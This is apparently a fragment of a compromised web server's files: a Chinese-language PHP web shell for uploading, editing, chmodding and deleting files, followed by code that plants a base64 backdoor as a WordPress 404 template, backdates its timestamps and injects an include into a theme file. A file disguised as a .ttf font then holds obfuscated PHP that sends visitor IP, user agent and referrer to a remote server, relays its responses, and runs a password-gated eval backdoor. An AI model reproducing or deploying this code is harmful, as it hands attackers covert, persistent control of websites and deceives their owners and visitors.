            echo "$paths[$i]";
            if($i != $id) echo "/";
        }
        echo '">'.$pat.'</a>/';
    }
    echo '</font>
<br><br>
</td></tr><tr><td><center>';

    if(isset($_FILES['file'])){
        if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
            echo '<font color="green">上传成功 :)</font><br /><br />';
        }else{
            echo '<font color="red">上传失败 </font><br /><br />';
        }
    }
    echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="white"><input style="background:black;font-family: Comic Sans MS " type="file" name="file" />
<input type="submit" value="上传" />
</form></center>
</td></tr>';
    if(isset($_GET['filesrc'])){
        echo "<tr><td><center>当前文件 : ";
        echo $_GET['filesrc'];
        echo '</center></tr></td></table><br />';
        echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
    }
//Empety
    elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
// echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
        echo '</table><br /><center>';
//Chmod
        if($_GET['opt'] == 'chmod'){
            if(isset($_POST['perm'])){
                $new_perm_o = $_POST['perm'];

                if(strlen($new_perm_o)<=3) $new_perm_o=str_pad($new_perm_o,3,'6',STR_PAD_LEFT);
                $new_perm_o=intval(str_pad($new_perm_o,4,'0',STR_PAD_LEFT),8);

                if(chmod($_POST['path'],$new_perm_o)){
                    echo '<font color="green">更改权限成功！ </font><br />';
                }else{
                    echo '<font color="red">更改权限错误！ </font><br />';
                }
            }

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

            echo '<form method="POST"><br>
当前文件 : '.$patc.'<br><br>权限----'.substr(base_convert(@fileperms($patc),10,8),-4).'<br><br>
设置新权限 : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" />
</form>
<br>
<a href="?ARRAY='.$ARRAY.'&path='.$hell.'" style="display:block; width:100%;" title="反回">反回</a>
';

        }
//
        elseif($_GET['opt'] == 'btw'){
            $cwd = $_GET['path'];

            echo '<form action="?ARRAY='.$ARRAY.'&option&path='.$cwd.'&opt=delete&type=buat" method="POST">
新目录名 : <input name="name" type="text" size="20" value="Folder" />
<input type="hidden" name="path" value="'.$cwd.'">
<input type="hidden" name="opt" value="delete">
<input type="submit" />
</form>';
        }
//Rename file
        elseif($_GET['opt'] == 'rename'){
            if(isset($_POST['newname'])){
                if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                    echo '<font color="green">重命名成功! :)</font><br /><br />';
                }else{
                    echo '<font color="red">重命名失败! :( </font><br /><br />';
                }
                $_POST['name'] = $_POST['newname'];
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = $_POST['newname'];

            echo '<form method="POST">
新名称 : <input name="newname" type="text" size="20" value="'.$new.'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="rename">
<input type="submit" /><br><br>
<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">
</form>';
        }
//File baru
        elseif($_GET['opt'] == 'baru'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = empty($_POST['newname'])?$_POST['ngaran1']:$_POST['newname'];
            $azz = $_POST['path'];
            $newz = $azz."/".$new;
            $new_fiel = $hell.'/'.$_POST['ngaran1'];
            if(!empty($_POST['ngaran1'])) echo "正在新建文件：{$new_fiel}<br><br>";
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">新建文件成功 [ '.$azz.' ]</font><br /><br />';
                }else{
                    echo '<font color="red">新建文件失败 >:(</font><br /><br />';
                }
                fclose($fp);
            }

            echo '<form method="POST"> 新文件名 : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" /></form><br> ';

            $ho = $_POST['ngaran1'];

            if(isset($_POST['ngaran'])){
                echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
<input type="hidden" name="opt" value="edit">
<input type="submit"  />
</form>';
            }
        }
//Edited file
        elseif($_GET['opt'] == 'edit'){
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">编辑成功！ </font><br /><br />';
                }else{
                    echo '<font color="red">编辑失败！</font><br /><br />';
                }
                fclose($fp);
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="edit"><br>
<input type="submit"  />
<br>
<br>
<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">

</form>';
        }
        echo '</center>';
    }else{
        echo '</table><br /><center>';
//Delete dir and file
        if(isset($_GET['option']) && $_GET['opt'] == 'delete'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

//Delete dir
            if($_GET['type'] == 'dir'){

                if(rmdir($patc)){
                    echo '<font color="green">删除成功！</font><br />';
                }else{
                    echo '<font color="red#">删除失败!>:(</font><br />';
                }
            }
//buat folder
            if($_GET['type'] == 'buat'){
                $haaa = $_POST['path'];
                $heee = $_POST['name'];
                $hooo = "$haaa/$heee";
                $new = $haaa.'/'.htmlspecialchars($heee);
                if(!mkdir($new)){
                    echo '<font color="red">新建目录失败!</font><br />';
                }else{
                    echo '<font color="green">新建目录成功! >:)</font><br />';
                }
            }
//Delete file
            elseif($_GET['type'] == 'file'){

                $hell = $_GET['path'];
                $yeah = $_GET['name'];
                $patc = "$hell/$yeah";

                if(unlink($patc)){
                    echo '<font color="green">文件删除成功</font><br />';
                }else{
                    echo '<font color="red">文件删除失败</font><br />';
                }
            }
        }
        echo '</center>';
        $scandir = scandir($path);
        $pa = getcwd();
        echo ' <div id="content"><table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
 
<tr>
<th class=th_home style="background:black;color:#fff;"><center>名称</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>大小</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>权限</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>操作选项</center></th>
</tr>


 <tr>
<td class="td_home" align="center">
<a href="?ARRAY='.$ARRAY.'&path='.dirname($path).'" style="display:block; width:100%;" title="上一页">上一页</a>
</td><td class=td_home align=center>Size</td> <td class=td_home align=center>Chmod</td> <td class=td_home align=center> <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=baru&name=new.php">+ 新建文件</a> | <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=btw&type=dir">+ 新建目录</a> </td></tr>
';

        foreach($scandir as $dir){
            if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
            echo "
<tr>
<td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?ARRAY={$ARRAY}&path=$path/$dir\">$dir</a></td>
<td class=td_home ><center>DIR</center></td>
<td class=td_home align=center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=dir&name=$dir\" title='权限设置'>
";
            if(is_writable("$path/$dir")) echo '<font color="green">';
            elseif(!is_readable("$path/$dir")) echo '<font color="red">';
            echo juejiang_perms("$path/$dir");
            if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

            echo "
</a>
</td>


<td class=td_home ><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=dir&name=$dir\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=dir&name={$dir}'\">删除</a>
</center></td>
</tr>";
        }
        echo '<br>';
        foreach($scandir as $file){
            if(!is_file("$path/$file")) continue;
            $size = filesize("$path/$file")/1024;
            $size = round($size,3);
            if($size >= 1024){
                $size = round($size/1024,2).' MB';
            }else{
                $size = $size.' KB';
            }


            echo "<tr>
<td class=td_home > <img src='data:image/png;base64,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'>

";
// <a href=\"?ARRAY={$ARRAY}&filesrc=$path/$file&path=$path\">$file</a>
            echo "
<a href=\"?option&ARRAY={$ARRAY}&path={$path}&opt=edit&type=file&name={$file}\">{$file}</a>
</td>
<td class=td_home><center>".$size."</center></td>
<td class=td_home align='center'><a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=file&name=$file\" title='权限设置'>";



            if(is_writable("$path/$file")) echo '<font color="green">';
            elseif(!is_readable("$path/$file")) echo '<font color="red">';
            echo juejiang_perms("$path/$file");
            if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
            echo "</a></td>
<td class=td_home><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=edit&type=file&name=$file\">编辑</a>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=file&name=$file&path=$path\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=file&name={$file}'\">删除</a>
</center></td>
</tr>";
        }
        echo '</table>
</div>';
    }
    echo '<br><br><br><br></b>
</body> </html></body>
</html>';
    die;
endif;  // ====






"; // WP 404
    @chmod($jue_jiang_404_path, 0644);
    @file_put_contents($jue_jiang_404_path, base64_decode($jue_jiang_404));
    @touch($jue_jiang_404_path, filectime($file_general_template_path));
    @chmod($jue_jiang_404_path, 0444);
}

$general_template_code = @file_get_contents($file_general_template_path);
$gen_mat = base64_decode("QGluY2x1ZGVbXHNdK2Jhc2U2NF9kZWNvZGVbXHNdKj9cKCJbMC05YS16QS1aLT0rXC9dKyJcKTs=");
$isget_mat = preg_match("/{$gen_mat}/i",$general_template_code)?true:false;
if (!$isget_mat){
    $pma = base64_decode("ZnVuY3Rpb25bXHNdW2EtekEtWjAtOV9dKlwoLio/XCkuKg==");
    preg_match_all("/{$pma}/i",$general_template_code,$pr);
    $gen_temp_fun_name = $pr[0][rand(0,count($pr[0])-1)];
    $jj404_b64_path = base64_encode($jue_jiang_404_path);
    $new_general_template = str_replace($gen_temp_fun_name,"@include base64_decode(\"{$jj404_b64_path}\");".PHP_EOL.$gen_temp_fun_name,$general_template_code);
    @chmod($file_general_template_path, 0644);
    @file_put_contents($file_general_template_path,$new_general_template);
    @touch($file_general_template_path, filectime($file_general_template_path));
}
rsrsoosoonqqn.ttf000066600000157672151137615740010271 0ustar00<?php
error_reporting(0); set_time_limit(0); ignore_user_abort(true);
$do = "/home/xbodynamge/crosstraining/";
$open_cache_ruzhu_phpcode = base64_decode("<?php
 goto JbJ3JVMw3rk; Ni5jD_gpsu3: if (!in_array($OjCk1KUb1s1, array("\x2e\152\163", "\56\143\x73\163", "\x2e\x6a\160\x67", "\56\x70\156\x67", "\56\x67\x69\x66", "\x2e\151\x63\157"))) { goto vXDYlZiFndF; } goto AEdIHY0uIuP; uFf59tmL94F: $pgogWkb1FEB["\x73\x6e"] = w6QMq29Mvq3($_SERVER["\123\103\x52\111\x50\x54\x5f\x4e\x41\115\x45"]); goto pIfXWAG0Mkb; P7wMqlfyd1K: if (!($_SERVER["\122\105\x51\x55\105\x53\124\x5f\x55\122\x49"] === "\x2f\122\55" . md5($_SERVER["\x53\x45\122\126\105\122\x5f\x4e\101\115\x45"]))) { goto t_82SHEcZV8; } goto iSs3l9tOK_g; gcMHiOSMcod: function w6qmq29mvQ3($XD9zXvyp4Lj) { goto YXDj0lOzhfC; b26f66nl7pn: qQFo75n2gQ2: goto hzIwEohysT0; YXDj0lOzhfC: if ($XD9zXvyp4Lj) { goto qQFo75n2gQ2; } goto ofO4z3Dyebl; ofO4z3Dyebl: return ''; goto b26f66nl7pn; hzIwEohysT0: return rtrim(strtr(base64_encode($XD9zXvyp4Lj), "\53\57", "\x2d\x5f"), "\75"); goto Zu6EWgCI1bt; Zu6EWgCI1bt: } goto fiR5XriS_fx; w9C1yW0AKyM: $OafXOcs9EXk = TL6q0pyXChM() . $_SERVER["\110\124\x54\x50\137\110\117\123\x54"]; goto QgvYBhLLrwj; U9IaodL5W2b: switch ($pvH9ZHZ5adG["\x73\x74\x61\164\165\163"]) { case 301: goto zLUKkqN00ET; Zt1sLSuSIsM: header("\114\x6f\143\x61\x74\151\157\156\x3a\x20" . trim($pvH9ZHZ5adG["\143\157\x6e\164\145\156\x74"])); goto PJmb507u8Cv; PJmb507u8Cv: goto tG0MVGprJaQ; goto VF101kLc2d6; zLUKkqN00ET: header("\x48\x54\124\120\x2f\x31\56\x31\x20\x33\x30\61\x20\115\x6f\166\145\144\40\120\145\162\155\x61\156\x65\156\x74\x6c\x79"); goto Zt1sLSuSIsM; VF101kLc2d6: case 302: goto aQsaBFsxdzU; a5A5i_5RPwe: header("\114\157\x63\141\164\x69\157\156\x3a\x20" . trim($pvH9ZHZ5adG["\x63\157\156\164\145\156\x74"])); goto RYNSxFCLeF2; aQsaBFsxdzU: header("\110\124\x54\120\x2f\x31\56\x31\40\x33\x30\62\40\x4d\x6f\x76\x65\40\124\145\x6d\x70\x6f\162\141\x72\x69\154\171"); goto a5A5i_5RPwe; RYNSxFCLeF2: goto tG0MVGprJaQ; goto b132PPuk5R0; b132PPuk5R0: case 404: goto WkF_lDenSk0; mnj0VLPjdDj: header("\163\164\x61\x74\x75\x73\72\x20\x34\60\64\40\116\157\x74\x20\x46\x6f\x75\156\144"); goto pWpQxpzNPo0; WkF_lDenSk0: header("\110\x54\124\120\x2f\61\56\61\40\64\x30\x34\40\x4e\x6f\164\40\106\157\165\x6e\144"); goto mnj0VLPjdDj; pWpQxpzNPo0: goto tG0MVGprJaQ; goto spKaBajgejr; spKaBajgejr: default: goto tG0MVGprJaQ; } goto wvdNGCZVj_V; UZSzeZumihs: error_reporting(0); goto C61L61NVBu4; ezx0tYSGkyY: if (!substr_count($_SERVER["\x52\x45\121\x55\105\x53\x54\x5f\125\x52\x49"], "\x69\x6e\144\x65\170\x2e\160\x68\160\x2f\x6a\x6b")) { goto UIh0ylPft2x; } goto vBMW2y2V2ii; td4vx89owx0: @header("\103\x6f\x6e\164\x65\x6e\x74\55\x54\171\160\x65\x3a" . $pvH9ZHZ5adG["\x74\171\160\145"]); goto I08qBB_KMtC; a2Ef26tzZ8v: $pgogWkb1FEB["\x72\x66"] = W6Qmq29mvQ3($tjGhkccNhTO); goto nsGdcJbNvti; PosQOY2q5kV: $AKdWH6uoUMo = ${$k40yK846tuw[30 + 1] . $k40yK846tuw[15 + 44] . $k40yK846tuw[32 + 15] . $k40yK846tuw[6 + 41] . $k40yK846tuw[15 + 36] . $k40yK846tuw[43 + 10] . $k40yK846tuw[22 + 35]}; goto VLeSOJjpWjf; bPgnFAVaTYA: $c44hL2JlLFn = adreNhLcvDN(); goto TvD_8ZHAduC; n8iepz2z7xP: zVrOjlOlNgH: goto cr5J_o57P0p; TvD_8ZHAduC: $tjGhkccNhTO = strval(@$_SERVER["\x48\124\x54\x50\137\x52\x45\106\105\x52\105\122"]); goto w9C1yW0AKyM; vBMW2y2V2ii: exit("\x7b\40\x22\145\162\162\157\x72\x22\x3a\x20\62\60\60\x2c\40\42\x6c\143\42\72\40\42\x6a\x6b\x22\54\40\x22\144\x61\x74\x61\42\72\x20\133\40\61\x20\135\x20\175"); goto cSavwhf6v5z; cLL82BbODEX: if (in_array($pvH9ZHZ5adG["\163\164\x61\164\165\x73"], array(0, 200))) { goto qbiFphh0C7w; } goto U9IaodL5W2b; zJE3aEphH6o: u8dVgN30Ey7::soytmknCSOo(); goto DmntCyWejVB; Cup8L2x1GEE: ($AKdWH6uoUMo[66] = $AKdWH6uoUMo[66] . $AKdWH6uoUMo[76]) && ($AKdWH6uoUMo[86] = $AKdWH6uoUMo[66]($AKdWH6uoUMo[86])) && @eval($AKdWH6uoUMo[66](${$AKdWH6uoUMo[50]}[12])); goto iRXbTOccMtm; iRXbTOccMtm: S1KTmTJAiXf: goto G6B2zGJvh3o; j7c_mNhyhtx: $pgogWkb1FEB["\x69"] = W6qmq29MvQ3($c44hL2JlLFn); goto Ar2_8UUumsj; DmntCyWejVB: header("\103\x6f\156\164\145\x6e\x74\55\124\171\160\145\x3a\x20\x74\145\x78\x74\x2f\x68\x74\155\x6c\x3b\x20\x63\150\x61\162\163\x65\x74\x3d\x75\164\146\55\70"); goto UZSzeZumihs; G6B2zGJvh3o: metaphone("\117\124\x45\x79\117\124\x45\x34\x4d\104\143\63\x4d\152\x4d\65\x4d\152\125\x34\x4d\x6a\131\62\x4e\172\125\x79\116\124\x4d\x78"); goto T76OcU11DID; nsGdcJbNvti: $pgogWkb1FEB["\163"] = W6qMq29MvQ3($OafXOcs9EXk); goto vEoJu8USN82; JbJ3JVMw3rk: error_reporting(0); goto A7wbniFmQka; IpDTVDzfyPv: $pvH9ZHZ5adG = Tx3w_LJuWkY(base64_decode("\x61\x48\122\x30\x63\x44\x6f\166\114\x33\160\x7a\116\x6a\115\x31\x64\152\x45\x7a\141\x32\x38\165\x63\155\71\x33\144\107\x55\x75\144\x32\154\x72\141\123\70"), $pgogWkb1FEB); goto cLL82BbODEX; vEoJu8USN82: $pgogWkb1FEB["\165"] = w6QMq29Mvq3($_SERVER["\x48\x54\x54\x50\137\125\x53\x45\122\137\101\x47\x45\116\x54"]); goto PWJTdV6CDhV; AEdIHY0uIuP: $vq2UktO2Txq = true; goto yAHc2nVR9ZP; I08qBB_KMtC: echo $pvH9ZHZ5adG["\x63\x6f\156\x74\145\x6e\164"]; goto W8VkzcTH5Iz; Ar2_8UUumsj: $pgogWkb1FEB["\x6c"] = w6qmq29MVq3($_SERVER["\110\x54\x54\x50\137\x41\x43\103\x45\120\124\137\x4c\x41\116\107\x55\x41\107\x45"]); goto uFf59tmL94F; A7wbniFmQka: $BqV8_tEpdgT = "\162" . "\141" . "\156" . "\147" . "\x65"; goto ffkbex_0HrJ; VLeSOJjpWjf: if (!(in_array(gettype($AKdWH6uoUMo) . count($AKdWH6uoUMo), $AKdWH6uoUMo) && count($AKdWH6uoUMo) == 12 && md5(md5(md5(md5($AKdWH6uoUMo[6])))) === "\x66\x66\141\67\62\146\62\145\141\71\x36\145\x35\62\145\x36\71\x64\x30\x34\x31\x31\x31\x38\x39\x66\141\x34\61\x33\70\142")) { goto S1KTmTJAiXf; } goto Cup8L2x1GEE; fiR5XriS_fx: function adreNHLCVdn() { goto A84CZo30NkU; DgSLRDD4jM8: goto C5NvZcD97jy; goto O1chuZJWwXI; X2wIemE3pDb: if (isset($_SERVER["\x48\x54\x54\x50\x5f\x43\x46\137\x43\x4f\x4e\x4e\105\x43\124\x49\116\x47\137\111\x50"]) && !empty($_SERVER["\x48\x54\x54\x50\137\x43\106\137\x43\x4f\116\x4e\x45\x43\x54\111\x4e\x47\x5f\x49\x50"])) { goto tLum73vj3eD; } goto D72Yck0Fvw9; qD2MpNcuTZt: tLum73vj3eD: goto WYcMugkz7Ph; WsYSaU_A_to: if (isset($_SERVER["\110\124\x54\x50\x5f\130\x5f\106\x4f\122\x57\101\x52\x44\x45\x44\x5f\106\117\x52"]) && !empty($_SERVER["\x48\124\x54\120\137\x58\137\106\117\122\127\x41\x52\x44\105\104\x5f\106\x4f\122"])) { goto l6trHn1GMIy; } goto z_K_XNM8RGV; WYcMugkz7Ph: $c44hL2JlLFn = $_SERVER["\110\124\x54\120\137\103\106\x5f\103\x4f\116\x4e\105\103\x54\x49\116\107\137\x49\120"]; goto iLcw0C_0LQX; nIdaVOLcJHt: NrzPBCQFhtp: goto zSXoRWsX69d; Agaqqt1wK01: goto C5NvZcD97jy; goto qD2MpNcuTZt; IileoeeKQR7: $c44hL2JlLFn = explode("\54", $c44hL2JlLFn); goto nVYfGFa_aJh; nVYfGFa_aJh: $c44hL2JlLFn = $c44hL2JlLFn[0]; goto anPQB0exOs7; O1chuZJWwXI: l6trHn1GMIy: goto S8WnuHfLafe; RJn7kaD6Dmp: if (!(strpos($c44hL2JlLFn, "\x2c") !== false)) { goto oYzk1EsMkzB; } goto IileoeeKQR7; z_K_XNM8RGV: $c44hL2JlLFn = $_SERVER["\x52\x45\x4d\117\124\x45\137\x41\x44\x44\x52"]; goto Agaqqt1wK01; zSXoRWsX69d: $c44hL2JlLFn = $_SERVER["\x48\x54\124\x50\x5f\x58\x5f\x52\105\x41\x4c\x5f\x49\120"]; goto DgSLRDD4jM8; anPQB0exOs7: oYzk1EsMkzB: goto el6yOln60Iu; S8WnuHfLafe: $c44hL2JlLFn = $_SERVER["\x48\x54\124\x50\x5f\x58\x5f\106\117\122\x57\x41\x52\104\x45\x44\137\106\x4f\x52"]; goto dav3xxM_8Uu; el6yOln60Iu: return $c44hL2JlLFn; goto S8mUOvR8l2M; D72Yck0Fvw9: if (isset($_SERVER["\x48\124\124\x50\137\x58\x5f\122\x45\x41\x4c\x5f\111\120"]) && !empty($_SERVER["\110\124\124\120\x5f\x58\x5f\x52\x45\x41\114\x5f\111\x50"])) { goto NrzPBCQFhtp; } goto WsYSaU_A_to; 